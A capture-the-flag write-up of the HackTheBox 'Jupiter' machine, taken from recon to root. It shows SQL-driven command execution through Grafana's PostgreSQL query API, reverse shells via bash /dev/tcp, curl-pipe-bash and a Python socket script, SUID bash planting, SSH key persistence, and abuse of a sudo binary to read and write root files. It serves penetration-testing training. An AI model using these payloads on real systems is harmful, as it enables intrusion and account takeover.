HackTheBox | Jupiter
Writeup of a medium-rated Linux machine from HackTheBox
Recon
Port Scanning
Initial Scan:
Initial nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -T4 -oN nmap/nmap.inital 10.10.11.216
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-16 23:14 EDT
Nmap scan report for 10.10.11.216
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 ac:5b:be:79:2d:c9:7a:00:ed:9a:e6:2b:2d:0e:9b:32 (ECDSA)
|_ 256 60:01:d7:db:92:7b:13:f0:ba:20:c6:c9:00:a7:1b:41 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://jupiter.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.96 seconds
All ports:
1
2
3
4
$ nmap -p- -T4 10.10.11.216
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
- Same ports discovered during the initial scan
/etc/hosts
According to nmap, navigating to http://10.10.11.236 redirects to http://jupiter.htb, which means we need to add this hostname into our local /etc/hosts
file:
1
$ echo '10.10.11.216 jupiter.htb' >> /etc/hosts
Service Enumeration
SSH - 22:
I’ll temporarily suspend the enumeration of this service, just in case I don’t discover any valuable information that could help establish an initial foothold on the other service.
TCP/80: jupiter.htb
Front page:
Navigating to http://jupiter.htb, we see the following page (/index.html
)
- The header of the page contains some buttons that leads to different pages such as:
Source Code:
The source code of the front page contains only the usual stuff and does not have some interesting comments and files that we can investigate further.
The /js/
and /img
directories, where Javascript files and images are stored, does not have directory listing enabled, and returns a 403 FORBIDDEN upon accessing it:
/services.html:
The /services.html
page list out the services provided by the company ‘Jupiter’:
/portfolio.html:
The /portfolio.html
page contains some Juno images:
- Each image is identified with an ID and can be access via
/img/nasa/<id>.jpg
We might want to fuzz the id of the image to see whether there are some hidden images !!
/contact.html:
The /contact.html
page contains some contact information:
- Email address: support@jupiter.htb
- Hotline: 1-677-124-44227 • 1-688-356-66889
- Address:
Los Angeles Gournadi, 1230 Bariasl
Fuzzing:
- Fuzzing for files/directories does not reveal interesting files/directories. However by fuzzing for virtual hosts using
ffuf
, I found a virtual hostkiosk.jupiter.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ffuf -u http://jupiter.htb -H 'Host: FUZZ.jupiter.htb' -fc 301 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://jupiter.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.jupiter.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 301
________________________________________________
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 325ms]
* FUZZ: kiosk
:: Progress: [19966/19966] :: Job [1/1] :: 32 req/sec :: Duration: [0:05:18] :: Errors: 1 ::
TCP/80: kiosk.jupiter.htb
Front page:
Before navigating to http://kiosk.jupiter.htb/, let’s add the new virtual host into our /etc/hosts
file, as displayed below:
1
$ echo '10.10.11.216 jupiter.htb kiosk.jupiter.htb' >> /etc/hosts
This virtual host is running a Grafana instance, which is an open-source, highly customizable platform used for monitoring and observability. It provides a way to visualize, analyze and understand metrics and data from various sources in real-time.
The running version is 9.5.2
, which is is not vulnerable to any critical vulnerability such as Remote Code Execution that would allow to gain a shell on the target system.
/login:
Clicking on the Sign in
button on the top right hand-side of the page, leads to the login page, where a user can enter a valid username/email and password in order to login successfully:
Directory Fuzzing:
Using ffuf
, I was able to identify multiple directories/files but most of them are not really interesting and will prove to be useful for this pentest.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
ffuf -u http://kiosk.jupiter.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://kiosk.jupiter.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 574ms]
* FUZZ: login
[Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 648ms]
* FUZZ: profile
[Status: 302, Size: 31, Words: 2, Lines: 3, Duration: 626ms]
* FUZZ: public
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 2469ms]
* FUZZ: signup
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 604ms]
* FUZZ: admin
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 197ms]
* FUZZ: plugins
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 626ms]
* FUZZ: live
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 215ms]
* FUZZ: org
[Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 1086ms]
* FUZZ: logout
[Status: 200, Size: 26, Words: 3, Lines: 3, Duration: 638ms]
* FUZZ: robots.txt
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 3524ms]
* FUZZ: explore
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 243ms]
* FUZZ: monitoring
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 633ms]
* FUZZ: verify
[Status: 200, Size: 109728, Words: 3099, Lines: 1380, Duration: 1090ms]
* FUZZ: metrics
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 178ms]
* FUZZ: configuration
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 1475ms]
* FUZZ: connections
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 1080ms]
* FUZZ: styleguide
API queries:
After some time trying to find the vulnerability in this web application, I revisited the previous requests that I (and the web application) made, in the HTTP History tab of Burpsuite (Because I always enable passive intercepting of request in the background while manually enumerating the web application !!) and I found some interesting API calls. When a user navigates to http://kiosk.jupiter.htb, the below are the requests that are made in the background:
- As can be seen, the first request is the GET request to
kiosk.jupiter.htb
. After that, multiple API requests are issued. the most interesting requests are the POST request to/api/ds/query
endpoint.
Let’s take the first POST request and analyze it further to see what it does exactly:
- As can be seen, this request is actually executing a SQL query (via
rawSql
key) on a PostgreSQL database. And the web application is returning the results of the query via thevalues
key:
With that in mind, we can use this endpoint to issue SQL queries to the database and will probably retrieve sensitive information such as credentials to gain a foothold on the server.
Initial Foothold
Shell as postgres
Interacting with the database
- By referring to this PayloadAllTheThings cheat-sheet, we can perform a proper enumeration of the target PostgreSQL database.
Enumeration: Version
We can enumerate the version by running the SQL query: SELECT version()
:
- As can be seen, the target version of PostgreSQL is
14.8
and is running on a 64-bit Ubuntu operating system.
Enumeration: Usernames & Password hashes
We can return a list of usernames for all the database users in this PostgreSQL database, by running the command: SELECT usename FROM pg_user;
- There are 2 users:
postgres
grafana_viewer
We can also return password hashes of these 2 users: SELECT username,passwd FROM pg_shadow;
Enumeration: Database Name
We can get the name of the current database via the command: SELECT current_database();
- The current database is
moon_namesdb
.
Enumeration: Listing databases
We can get a list of databases via the command SELECT datname FROM pg_database;
Enumeration: Tables
We can get a list of tables names in the current database using the SQL command SELECT table_name FROM information_schema.tables;
- As can be seen, multiple tables are returned. However, the most interesting table in there is
cmd_exec
table, which can be used to execute commands on the server as shown here
NOTE: The table
pg_user
would also be interesting if the password are printed, but in this case, they are not (replaced by asterisks ‘*’)
Running the 'id' command
NOTE: If the table
cmd_exec
does not exist in your case, you can simply create by issuing the SQL query:CREATE TABLE cmd_exec(cmd_output text);
and then continue the exploitation as shown below !!
We can run a command by simply issuing the below SQL query:
1
COPY cmd_exec FROM PROGRAM 'id';
After that, We can get the output of this command by running the SQL query:
1
SELECT * FROM cmd_exec;
- As can be seen, the PostgreSQL database is running as the user
postgres
.
Foothold as postgres
We can gain an initial foothold on the box, as postgres
, by following the steps below:
1- Create a file named rev.sh
that contains the following bash script:
1
/usr/bin/bash -i >& /dev/tcp/<tun0-IP>/9999 0>&1
2- Start a python web server on port 80, which will serve the rev.sh
file.
1
python3 -m http.server 80
3- Start a netcat listener on port 9999:
1
nc -nlvp 9999
4- Execute the following SQL query:
1
COPY cmd_exec FROM PROGRAM 'curl http://<tun0-IP>/rev.sh | bash';
5- Check your netcat listener:
Inside the box
Shell Stabilization
The stabilization process can be seen in the figure below:
Enumeration
- There are 4 users with a console:
root
,juno
,jovian
and mepostgres
1
2
3
4
5
6
postgres@jupiter:~$ cat /etc/passwd | grep sh$
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
juno:x:1000:1000:juno:/home/juno:/bin/bash
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
jovian:x:1001:1002:,,,:/home/jovian:/bin/bash
- There are no interesting binaries with SUID bit set
- The user
postgres
may not run sudo in the box - The
opt
contains a folder calledsolar-flares
. However,postgres
does not have access rights to it. Only the userjovian
and members of the groupscience
can access it:
- In the attempt of searching for files/directories owned by other users and in the same time readable or writable by me (
postgres
), I found an interesting file namednetwork-simulation.json
and located in/dev/shm/network-simulation.yml
directory:
1
2
3
postgres@jupiter:/$ find / -type f -user juno -readable -writable 2>/dev/null | grep -v 'proc\|usr\|var\|boot'
/dev/shm/network-simulation.yml
- As can be seen, this file is owned by
juno
user and is readable/writable by any other users, includingpostgres
.
network-simulation.yml file
Below, is the content of this file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
postgres@jupiter:/dev/shm$ cat network-simulation.yml
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/python3
args: -m http.server 80
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/curl
args: -s server
start_time: 5s
- In summary, this is a YAML configuration file which sets up a network simulation with a server an 3 client hosts. The server runs an HTTP server using Python, while the client uses cURL to make requests to the server.
With that in mind, I ran pspy64 binary to monitor ongoing processes and I noticed that this file is executed with juno
privileges every 2 minutes as a shadow simulation using the /home/juno/.local/bin/shadow
binary.
- As can be seen, when the yaml configuration file is executed, an HTTP server is launched using python and requests were made using cURL
Lateral Movement
Shell as juno
Exploiting shadow network simulation config file
Since the user postgres
has write permissions over the configuration file /dev/shm/network-simulation.yml
, we can modify the YAML configuration file as explained below to gain access as juno
user.
- Set the
args
key to be/usr/bin/bash /var/tmp/bash
for the host with the name ‘server’ - Set the
path
key to be/usr/bin/chmod
and theargs
key to beu+s /var/tmp/bash
for the second host named ‘client’
Below is the entire configuration file (modified) :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/cp
args: /usr/bin/bash /var/tmp/bash
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/chmod
args: u+s /var/tmp/bash
start_time: 5s
This configuration, when executed, will make the following actions:
- Copy the
/usr/bin/bash
binary into/var/tmp/
directory - Grant the SUID bit to the copied binary
/var/tmp/bash
, which then can be used to escalate tojuno
user via the command/var/tmp/bash -p
Now, all we can do is wait for the configuration file to be executed and we will get a bash session as juno
by running the command:
1
postgres@jupiter:~$ /var/tmp/bash -p
SSH Access (Persistence)
To gain a stable persistent access on the target machine as juno
, we can generate locally an SSH key pair (id_rsa
and id_rsa.pub
), and then add the private key (The content of id_rsa.pub
) into the /home/juno/.ssh/authorized_keys
file:
1- Generate SSH keys on the attacking machine:
1
$ ssh-keygen
2- Copy the content of id_rsa.pub
:
1
$ cat id_rsa.pub | xclip -selection clipboard
3- Go back to the target machine and paste the copied public key into /home/juno/.ssh/authorized_keys
file:
1
juno@jupiter:~$ echo '<paste-here>' >> /home/juno/.ssh/authorized_keys
4- On the attacking machine, run the command below to establish an SSH connection using private key:
1
2
$ ssh -i id_rsa juno@jupiter.htb
Enter passphrase for key 'id_rsa': <Enter the passphrase you set in ssh-keygen, here>
Shell as jovian
Running services
- After gaining access on the box as
juno
, I checked if this user can run binary with sudo, but a password is required in order to get this info, which we do no have. - After that, I run the
ss -lntp
command to view running services on the machine and I found 3 services running internally on localhost interface, as shown in the figure below:
To interact with these services, I did port forwarding via SSH as shown below:
1
2
3
4
5
6
7
8
$ ssh -i id_rsa -L 3000:127.0.0.1:3000 -f -N juno@jupiter.htb
Enter passphrase for key 'id_rsa':
$ ssh -i id_rsa -L 5432:127.0.0.1:5432 -f -N juno@jupiter.htb
Enter passphrase for key 'id_rsa':
$ ssh -i id_rsa -L 8888:127.0.0.1:8888 -f -N juno@jupiter.htb
Enter passphrase for key 'id_rsa':
- With this step out of the way, we can enumerate these services on our attacking machine.
Enumeration of services
A quick nmap scan on these services, we get the following result:
1
2
3
4
5
6
7
8
9
$ nmap -p8888,5432,3000 127.0.0.1 -sV
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-18 19:52 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
3000/tcp open ppp?
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8888/tcp open http Tornado httpd 6.2
1- The service on port 3000 is running a Grafana instance (The same version of Grafana instance running on port 80)
2- The service on port 5432 running a PostgreSQL version 9.6.0 or later. This version is not vulnerable to a critical vulnerability and we don’t have legitimate credentials to access the database. This PostgreSQL database is probably the one we interacted with in order to gain a foothold on the box as postgres
.
3- The final service running on port 8888 is running a Jupyter Notebook application. Navigating to http://127.0.0.1:8888/ you will be presented with a login page where you need to provide a password or access token in order to gain access to the dashboard.
Finding the token
The user juno
(our user) is a member of the science
group, which means we can access the folder solar-flares
(we encountered earlier when performing enumeration as postgres
), inside the /opt
directory.
This folder contains some file with .ipynb
extension, which are notebook document created by Jupyter Notebook itself. There is also a bash script named start
, which will basically start a Jupyter Notebook server without opening a web browser and runs the the Jupyter Notebook file flares.ipynb
. It also redirects standard error output to the log file in the /opt/solar-flares/logs/
directory.
The logs
folder contains multiple log files saved from different timestamps. Each log file contains a token. This token is printed to the user each time the Jupyter server is started. With that in mind, the last saved log file would probably contain the correct token, in my case it was 2e820a7a74308131cb7bf5e7761eaca866837fb548fd6820
It might be a different token in your case !!
Access Jupyter Notebook Dashboard
We can use this token to access the dashboard of Jupyter Notebook Application:
- As can be seen, we are presented with the files and folders located in the
/opt/solar-flares
directory, which is the directory from which the notebook was launched.
Code Execution
The Jupyter Notebook has a cool feature, which allows a user to run code in a wide range of languages. Each Notebook is associated with a kernel. If, for example, this notebook is associated with the IPython kernel, we can run python code within the application. This feature can be used in our favor, pentesters, to run OS command as the user who started the Notebook.
In this case, this notebook is associated with a Pyhton3 kernel, ipykernel:
By clicking on that button, Python3 (ipykernel), we will be redirected to the interface where we can execute python code:
Let’s, for example, run the whoami
command via the python script below:
1
2
3
import os
whoami = os.system("whoami")
print(whoami)
- As can be seen, we are running OS commands as the
jovian
.
NOTE: You can run the script by pressing
CTRL + ENTER
hotkey
Shell as jovian
We can gain a fully interactive shell, by following the steps below:
1- Start a netcat listener on a port of your choice (e.g. 9997)
1
$ nc -nlvp 9997
2- Run the python script:
1
2
3
4
5
6
7
8
9
10
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.126",9997)) # CHANGE THE IP AND PORT
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
3- Check your reverse shell:
Privilege Escalation
Shell as root
Enumeration
- The HOME directory of the user
jovian
contains only the usual files/directories that you’d see in any HOME directory. - This user, however, has the permission to run the binary
/usr/local/bin/sattrack
binary as root, without providing a password:
'sattrack' binary
Running this binary, returns the following message:
1
2
3
jovian@jupiter:~$ sudo /usr/local/bin/sattrack
Satellite Tracking System
Configuration file has not been found. Please try again!
It looks like it’s a ‘Satellite Tracking System’ and it needs a configuration file to be executed successfully.
After a quick google search on this tracking system, I didn’t really find any alike binaries. I found some old tools with the same name but the documentation is not properly written, so it’s hard to understand what the tool does and how to provide the configuration file it needs.
Running the
strings
command on the binary and grepping forconfig
we see that the binary reads a configuration file with a JSON format inside the/tmp/
directory. If the file with these attributes does not exist, it will return the message: ‘Configuration file has not been found. Please try again!’
'sattrack' directory
Every tool must have a config directory. That’s what pop in my head when I was looking online for this tool. After searching the filesystem for any folder/directory with the name ‘sattrack’, I found this directory:
1
2
jovian@jupiter:~$ find / -type d -name sattrack 2>/dev/null
/usr/local/share/sattrack
This directory contains 2 Json files (One of them is the config file the satellite tracking system need in order to run) and an image:
config.json file
The config.json
file contains the following:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
{
"tleroot": "/tmp/tle/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"http://celestrak.org/NORAD/elements/weather.txt",
"http://celestrak.org/NORAD/elements/noaa.txt",
"http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
Here is a breakdown of the key elements in this JSON configuration file:
tleroot
: defines the location to get & load TLE (Two-Line Element Set) files. In this file, it is set to/tmp/tle/
tlefile
: defines the TLE filename to load from thetleroot
.tlesources
: defines an array of URLs from whichtlefile
can be downloaded intotleroot
using something like ‘cURL’.
/root/root.txt
With this in mind, we can make this satellite tracker system download the root flag root.txt
and put it inside /tmp/tle
, which is defined in the tleroot
key.
This can be achieved by loading the configuration file below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
{
"tleroot": "/tmp/tle/",
"tlefile": "root.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"file:///root/root.txt"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
- The only modified 2 values are:
tlefile
, which is set toroot.txt
tlesources
, which is set to an array of one element that defines the location of the fileroot.txt
:file:///root/root.txt
We can put this file in the /tmp
directory, and run the sattrack
binary with root privileges:
Now the content of /root/root.txt
should be inside the /tmp/tle/
directory:
NOTE: I tried to retrieve the SSH private key of the root user
/root/.ssh/id_rsa
, but from the output below, it’s safe to assume that the file does not exist.
With this vulnerability, we can read any files on the server, including the /etc/shadow
file. We can then attempt to crack the root password hash and if successful, we can gain access via SSH as the root.
SSH Access as root
In order to gain an SSH access as root on this box, we can write our own SSH public key into the /root/.ssh/authorized_keys
file and then SSH as root using the private key.
To do so, we can follow the steps below:
1- Generate an SSH keys using ssh-keygen
:
1
$ ssh-keygen
2- Save the public key id_rsa.pub
into a file called authorized_keys
1
$ mv id_rsa.pub authorized_keys
3- Start an HTTP server serving the authorized_keys
file
1
$ python3 -m http.sevrer 80
4- Go back to the target machine, and modify the /tmp/config.json
file as shown below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
{
"tleroot": "/root/.ssh/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"http://10.10.14.126/authorized_keys",
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
5- Run the sattrack
binary with sudo:
1
jovian@jupiter:/tmp$ sudo /usr/local/bin/sattrack
6- SSH into the box as root: